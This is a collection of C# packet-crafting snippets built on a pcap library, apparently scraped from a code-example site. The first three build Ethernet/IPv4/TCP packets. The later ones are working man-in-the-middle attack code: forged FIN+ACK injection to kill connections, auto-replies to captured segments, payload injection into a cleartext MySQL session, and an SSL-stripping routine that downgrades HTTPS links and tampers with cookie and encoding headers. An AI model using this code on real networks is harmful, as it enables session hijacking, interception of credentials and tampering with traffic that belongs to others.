Ejemplo n.º 1
        // Builds an Ethernet frame carrying an IPv4 + TCP packet from the form's input controls.
        // Every header field is read from a text box or check box; the Convert.* and *.Parse calls
        // throw on malformed or out-of-range text, and nothing in this method catches that.
        private EthernetPacket TcPonIPv4PacketMaker()
        {
            // Ethernet layer: each MAC address is assembled from its six text boxes.
            var sourceMac = PhysicalAddress.Parse(
                MakeMaCaddr(SourceMAC1.Text, SourceMAC2.Text, SourceMAC3.Text, SourceMAC4.Text, SourceMAC5.Text, SourceMAC6.Text));
            var destMac = PhysicalAddress.Parse(
                MakeMaCaddr(DestMAC1.Text, DestMAC2.Text, DestMAC3.Text, DestMAC4.Text, DestMAC5.Text, DestMAC6.Text));
            var frame = new EthernetPacket(sourceMac, destMac, EthernetPacketType.IPv4);

            // TCP layer: ports, flags (check-list items 0..5 map to URG, ACK, PSH, RST, SYN, FIN)
            // and the numeric header fields.
            var segment = new TcpPacket(Convert.ToUInt16(SourcePortTextBox.Text), Convert.ToUInt16(DestPortTextBox.Text));
            segment.Urg = TCPFlagsCheckedListBox.GetItemChecked(0);
            segment.Ack = TCPFlagsCheckedListBox.GetItemChecked(1);
            segment.Psh = TCPFlagsCheckedListBox.GetItemChecked(2);
            segment.Rst = TCPFlagsCheckedListBox.GetItemChecked(3);
            segment.Syn = TCPFlagsCheckedListBox.GetItemChecked(4);
            segment.Fin = TCPFlagsCheckedListBox.GetItemChecked(5);
            segment.SequenceNumber = Convert.ToUInt32(SequenceTextBox.Text);
            segment.AcknowledgmentNumber = Convert.ToUInt32(AcknowledgmentTextBox.Text);
            segment.WindowSize = Convert.ToUInt16(WindowSizeTextBox.Text);
            segment.UrgentPointer = Convert.ToInt32(UrgPointerTextBox.Text);

            // The payload is optional and is encoded as ASCII.
            var payloadText = PayloadTextBox.Text;
            if (payloadText.Length > 0)
            {
                segment.PayloadData = Encoding.ASCII.GetBytes(payloadText);
            }
            segment.UpdateCalculatedValues();

            // IPv4 layer: each address is assembled from its four text boxes.
            var sourceIp = IPAddress.Parse(MakeIPaddr(SourceIP1.Text, SourceIP2.Text, SourceIP3.Text, SourceIP4.Text));
            var destIp = IPAddress.Parse(MakeIPaddr(DestIP1.Text, DestIP2.Text, DestIP3.Text, DestIP4.Text));
            var datagram = new IPv4Packet(sourceIp, destIp);
            datagram.TimeToLive = Convert.ToInt32(TTLTextBox.Text);
            datagram.Protocol = IPProtocolType.TCP;
            datagram.Version = IPVersion.IPv4;
            datagram.FragmentFlags = Convert.ToInt16(FragmentFlagsTextBox.Text);
            datagram.FragmentOffset = Convert.ToInt32(FragmentOffsetTextBox.Text);
            datagram.TypeOfService = Convert.ToInt32(TOSTextBox.Text);
            datagram.Id = Convert.ToUInt16(IdentifierTextbox.Text);
            datagram.PayloadPacket = segment;

            // Link the layers, then compute each checksum once its parent is in place.
            frame.PayloadPacket = datagram;
            datagram.ParentPacket = frame;
            datagram.UpdateIPChecksum();

            segment.ParentPacket = datagram;
            segment.UpdateTCPChecksum();

            return frame;
        }
Ejemplo n.º 2
        /// <summary>
        /// Wraps a TCP segment in a new IPv4 packet and refreshes the TCP and IP checksums.
        /// </summary>
        /// <param name="sourceIpAddress">Source address placed in the IPv4 header.</param>
        /// <param name="destinationIpAddress">Destination address placed in the IPv4 header.</param>
        /// <param name="payloadPacket">TCP segment that becomes the payload; its checksum is updated in place.</param>
        /// <returns>The new IPv4 packet with <paramref name="payloadPacket"/> attached.</returns>
        public static IPv4Packet CreateIpV4Packet(IPAddress sourceIpAddress, IPAddress destinationIpAddress,
                                                  TcpPacket payloadPacket)
        {
            var ipPacket = new IPv4Packet(sourceIpAddress, destinationIpAddress);
            ipPacket.PayloadPacket = payloadPacket;

            // The TCP checksum is refreshed only after the segment is attached to its IP packet.
            payloadPacket.UpdateTCPChecksum();

            // NOTE(review): UpdateCalculatedValues runs after the IP checksum is computed; if it
            // changes any header field the checksum would be stale — confirm against the library.
            ipPacket.UpdateIPChecksum();
            ipPacket.UpdateCalculatedValues();

            return ipPacket;
        }
Ejemplo n.º 3
    // Assembles an Ethernet / IPv4 / TCP packet from the src_* and dst_* fields and returns
    // the outermost (Ethernet) layer.
    private Packet GeneratePacket()
    {
        // FIXME the identical packet is rebuilt on every call; it could be built once and reused.
        var segment  = new TcpPacket(src_port, dst_port);
        var datagram = new IPv4Packet(src_ip, dst_ip);

        // NOTE(review): the frame is created with EthernetPacketType.None although its payload
        // is an IPv4 packet — confirm this is intended.
        var frame = new EthernetPacket(src_mac, dst_mac, EthernetPacketType.None);

        // Nest the layers from the outside in.
        frame.PayloadPacket    = datagram;
        datagram.PayloadPacket = segment;

        // Refresh checksums from the innermost layer outwards, then the frame's derived fields.
        segment.UpdateTCPChecksum();
        datagram.UpdateIPChecksum();
        frame.UpdateCalculatedValues();

        return frame;
    }
Ejemplo n.º 4
        /// <summary>
        ///     Attempts to end a tracked connection by sending a segment with FIN+ACK set.
        /// </summary>
        /// <param name="srcAddress">Start point of the connection; should be a little-endian address.</param>
        /// <param name="srcPort">Port at the start point of the connection.</param>
        /// <param name="dstAddress">End point of the connection; should be a big-endian address.</param>
        /// <param name="dstPort">Port at the end point of the connection.</param>
        /// <returns>
        ///     true once the packet has been handed to the device; false when no tracked link
        ///     matches the given address/port pair.
        /// </returns>
        public bool KillConnection(IPAddress srcAddress, ushort srcPort, IPAddress dstAddress, ushort dstPort)
        {
            EthernetPacket frame;

            // Look up the requested link; the list is locked for the whole lookup.
            lock (_tcpLinks)
            {
                var isTracked = _tcpLinks.Any(item => item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort &&
                                              item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort);
                if (!isTracked)
                {
                    return false;
                }

                // Re-parse the last packet recorded for that link into a fresh Ethernet frame.
                var link = _tcpLinks.Find(item => item.SrcAddress.Equals(srcAddress) && item.SrcPort == srcPort &&
                                          item.DstAddress.Equals(dstAddress) && item.DstPort == dstPort);
                frame = new EthernetPacket(link.LastPacket.BytesHighPerformance);
            }

            // Pull the IPv4 and TCP layers out of the recorded frame.
            var ipLayer = (IPv4Packet)frame.PayloadPacket;
            var lastTcp = (TcpPacket)ipLayer.PayloadPacket;

            // Build the closing segment from the recorded segment's ports, numbers and window.
            var closing = new TcpPacket(lastTcp.SourcePort, lastTcp.DestinationPort);
            closing.Fin = true;
            closing.Ack = true;
            closing.SequenceNumber = (uint)(lastTcp.SequenceNumber + (lastTcp.PayloadPacket?.TotalPacketLength ?? 0));
            closing.AcknowledgmentNumber = lastTcp.AcknowledgmentNumber;
            closing.WindowSize = lastTcp.WindowSize;

            closing.UpdateCalculatedValues();

            // Swap the closing segment into the recorded IP packet and refresh the TCP checksum.
            ipLayer.PayloadPacket = closing;
            closing.ParentPacket = ipLayer;
            closing.UpdateTCPChecksum();

            _device.SendPacket(frame);
            return true;
        }
Ejemplo n.º 5
        // Capture callback. It does three things per captured packet:
        //   1. refreshes the cached capture statistics when more than _lastStatisticsInterval has
        //      passed since the last refresh;
        //   2. while CaptureForm._pshPacket is set and the counter allows it, answers a PSH segment
        //      from TARGET_PORT by rewriting and sending the stored CaptureForm._lastAckPacket;
        //   3. appends the captured packet to _packetQueue under _queueLock.
        void device_OnPacketArrival(object sender, CaptureEventArgs e)
        {
            var Now      = DateTime.Now; // cache 'DateTime.Now' for minor reduction in cpu overhead
            var interval = Now - _lastStatisticsOutput;

            // Throttle: statistics are copied and the UI flagged only once per interval.
            if (interval > _lastStatisticsInterval)
            {
                //Console.WriteLine("device_OnPacketArrival: " + e.Device.Statistics);
                _captureStatistics       = e.Device.Statistics;
                _statisticsUiNeedsUpdate = true;
                _lastStatisticsOutput    = Now;
            }

            // Active only while a PSH packet has been recorded and the reply counter has not
            // passed RECEIVING_PACKED_EXPECTED. The CaptureForm statics are read and written here
            // without a lock.
            if (CaptureForm._pshPacket != null && _iRecvPackets <= RECEIVING_PACKED_EXPECTED)
            {
                Packet    p   = Packet.ParsePacket(e.Packet.LinkLayerType, e.Packet.Data);
                // NOTE(review): GetEncapsulated presumably returns null for a non-TCP packet, in
                // which case the tcp.Psh access below would throw — confirm against the library.
                TcpPacket tcp = TcpPacket.GetEncapsulated(p);
                // React only to data-bearing PSH segments whose source port is TARGET_PORT.
                if (tcp.Psh && tcp.SourcePort == TARGET_PORT && tcp.PayloadData.Length > 0)
                {
                    IPv4Packet ip         = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._pshPacket);
                    IPv4Packet lastAckIp  = (IPv4Packet)IpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
                    TcpPacket  lastAckTcp = TcpPacket.GetEncapsulated(CaptureForm._lastAckPacket);
                    // The stored ACK gets an IP Id ten above that of the recorded PSH packet.
                    lastAckIp.Id = (ushort)(ip.Id + 10);
                    lastAckIp.UpdateIPChecksum();
                    // Sequence/acknowledgment numbers are derived from the segment just captured:
                    // seq = its ack number, ack = its seq number plus its payload length.
                    lastAckTcp.SequenceNumber       = tcp.AcknowledgmentNumber;
                    lastAckTcp.AcknowledgmentNumber = (uint)(tcp.SequenceNumber + tcp.PayloadData.Length);
                    lastAckTcp.UpdateTCPChecksum();
                    _device.SendPacket(CaptureForm._lastAckPacket);
                    // The packet just sent becomes the reference for the next round.
                    CaptureForm._pshPacket = CaptureForm._lastAckPacket;
                    _iRecvPackets++;
                }
            }

            // Hand the raw capture to the consumer of _packetQueue.
            lock (_queueLock)
                _packetQueue.Add(e.Packet);
        }
Ejemplo n.º 6
        // Sniffer callback that edits captured TCP segments in place and re-sends them.
        // It reads and writes the static members Parent, LastSequenceId, Payload and ResponseOk.
        // The match on ResponseOk and the "SELECT" text both depend on the session being readable
        // in cleartext; a TLS-protected database connection gives this handler nothing to match.
        // The casts below throw InvalidCastException for frames that are not IPv4/TCP.
        static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
        {
            NetworkSniffer ns = (NetworkSniffer)sender;
            IPv4Packet     ip = (IPv4Packet)packet.PayloadPacket;
            TcpPacket      t  = (TcpPacket)ip.PayloadPacket;

            // If the received packet is the MySQL OK response
            if (t.PayloadData.SequenceEqual(ResponseOk))
            {
                // Remember this frame; the else branch reuses it later.
                Parent = packet;

                // Reuse the packet to send the row payload — yes, before the SELECT has been received
                LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
                ip.Id++;
                t.SequenceNumber = LastSequenceId;
                t.OptionsCollection.Clear();

                t.PayloadData = Payload;
                t.Ack         = true;
                t.Psh         = true;

                ip.UpdateCalculatedValues();
                t.UpdateCalculatedValues();

                ip.UpdateIPChecksum();
                t.UpdateTCPChecksum();

                ns.Send(packet);

                // Advance the stored sequence number past the payload that was just sent.
                LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
                Console.WriteLine(t.ToString(StringOutputType.Verbose));
            }
            else
            {
                // If the packet contains the text SELECT
                string ascii = Encoding.ASCII.GetString(t.PayloadData);
                if (Parent != null && ascii.Contains("SELECT"))
                {
                    // Stop acting from here on (the handler unsubscribes itself)
                    ns.OnPacket -= Ns_OnPacket;

                    // From here on ip and t refer to the layers of the stored Parent frame.
                    ip = (IPv4Packet)Parent.PayloadPacket;
                    t  = (TcpPacket)ip.PayloadPacket;

                    // Send an ACK for the received packet, to accept it
                    t.SequenceNumber       = LastSequenceId;
                    t.AcknowledgmentNumber = t.AcknowledgmentNumber; // self-assignment; the value is left as it was
                    t.PayloadData          = new byte[] { };
                    ip.Id++;
                    t.Ack = true;
                    t.Psh = false;

                    ip.UpdateCalculatedValues();
                    t.UpdateCalculatedValues();

                    ip.UpdateIPChecksum();
                    t.UpdateTCPChecksum();

                    // The object handed to Send is the frame that triggered this callback.
                    ns.Send(packet);
                    Console.WriteLine(t.ToString(StringOutputType.Verbose));
                }
            }
        }
Ejemplo n.º 7
        // Rewrites cleartext HTTP carried in a TCP segment and reports what it changed.
        // Payloads for which regexType yields more than two matches are handled as requests:
        // Accept-Encoding is blanked, If-Modified-Since is set to 1 Jan 2000 and, when stripCookies
        // is set, the Cookie header is renamed. Everything else is handled as a response:
        // "https://" in matching Location headers and in quoted links is rewritten to "http://".
        // The method returns true on every path; rawPacket is not used in this body.
        //
        // NOTE(review): the rewrites leave fixed artefacts on the wire that a server-side or IDS
        // check can match — an Accept-Encoding value made only of spaces, a "C00kie:" header, and
        // a space inserted before "http://". A browser that enforces HSTS (preloaded or already
        // cached) for the site does not follow the downgraded links.
        public bool ProcessPacket(Packet rawPacket, TcpPacket packet)
        {
            // Nothing to do for a segment without a parent (IP) layer or without payload bytes.
            if (packet.ParentPacket == null)
            {
                return(true);
            }
            if (packet.PayloadData == null)
            {
                return(true);
            }

            // Addresses are captured up front for the Stripped(...) report at the end.
            var sourceIP = ((IpPacket)packet.ParentPacket).SourceAddress.ToString();
            var destIP   = ((IpPacket)packet.ParentPacket).DestinationAddress.ToString();

            var payload = packet.PayloadData;

            var data = encodingUtf8.GetString(payload);

            if (data != string.Empty)
            {
                // Names of the rewrites applied to this payload; empty means the packet is untouched.
                var changed = new List <string>();
                var matches = SimpleRegex.GetMatches(regexType, data);

                // HTTP request
                if (matches.Count > 2)
                {
                    // check for images - stop further processing
                    if (matches[2].Contains(".png") || matches[2].Contains(".jpg") || matches[2].Contains(".gif"))
                    {
                        return(true);
                    }

                    // check for Accept-Encoding and replace it to prevent unreadable data
                    if (data.Contains("Accept-Encoding:"))
                    {
                        // diff = number of characters an empty-valued header would remove.
                        var diff = data.Length - regexEncoding.Replace(data, "Accept-Encoding: \r\n").Length;

                        var extra = string.Empty;

                        // Pad with that many spaces so the rewritten text has the original length.
                        for (int i = 0; i < diff; i++)
                        {
                            extra += " ";
                        }

                        data = regexEncoding.Replace(data, "Accept-Encoding: " + extra + "\r\n");

                        changed.Add("Accept-Encoding");
                    }

                    // check for If-Modified-Since and replace it to prevent caching
                    if (data.Contains("If-Modified-Since:"))
                    {
                        var time = new DateTime(2000, 1, 1);

                        // "R" formats the date in RFC 1123 form.
                        data = regexModified.Replace(data, "If-Modified-Since: " + time.ToString("R") + "\r\n");
                        changed.Add("If-Modified-Since");
                    }

                    // check for cookies and strip them if necessary
                    if (stripCookies && data.Contains("Cookie:"))
                    {
                        // Same-length rename of the header name.
                        data = data.Replace("Cookie:", "C00kie:");

                        changed.Add("Cookies");
                    }
                }
                // HTTP response
                else
                {
                    // check for html tags - stop further processing
                    if (!(data.Contains("<form") || data.Contains("<input") || data.Contains("<a ") || data.Contains("</a>") || data.Contains("</div>") || data.Contains("<meta") || data.Contains("javascript")))
                    {
                        return(true);
                    }

                    var cmatches = SimpleRegex.GetMatches(regexCType, data);

                    // check for images - stop further processing
                    if (cmatches.Count > 1 && cmatches[1].Contains("image"))
                    {
                        return(true);
                    }

                    // HTTP 302 redirect stripping
                    foreach (var item in stripRedirects)
                    {
                        if (data.Contains("Location: " + item))
                        {
                            // The replacement has the same length as the text it replaces.
                            data = data.Replace("Location: https://", "Location:  http://");

                            changed.Add("HTTPS (302 redirect)");
                        }
                    }

                    // other links, actions...
                    if (data.Contains("\"https://") || data.Contains("'https://"))
                    {
                        // Both replacements keep the length by adding a space after the quote.
                        data = data.Replace("\"https://", "\" http://");
                        data = data.Replace("'https://", "' http://");

                        changed.Add("HTTPS");
                    }
                }

                if (changed.Count > 0)
                {
                    // change packet data to stripped one
                    var bytes = encodingUtf8.GetBytes(data);
                    // Byte-length difference between the old and the new payload.
                    var diff  = packet.PayloadData.Length - bytes.Length;

                    packet.PayloadData = bytes;
                    packet.UpdateTCPChecksum();

                    // checksum fixes for IPv4 packets (IPv6 packet doesn't have a checksum)
                    if (packet.ParentPacket is IPv4Packet)
                    {
                        var ip = (IPv4Packet)packet.ParentPacket;
                        ip.TotalLength   = ip.HeaderLength + packet.Bytes.Length;
                        ip.PayloadLength = (ushort)packet.Bytes.Length;
                        // The stored header checksum is adjusted by the length difference.
                        ip.Checksum      = (ushort)(ip.Checksum + diff);
                    }

                    // Report the endpoints and the list of rewrites applied.
                    Stripped(sourceIP, destIP, changed);
                }
            }

            return(true);
        }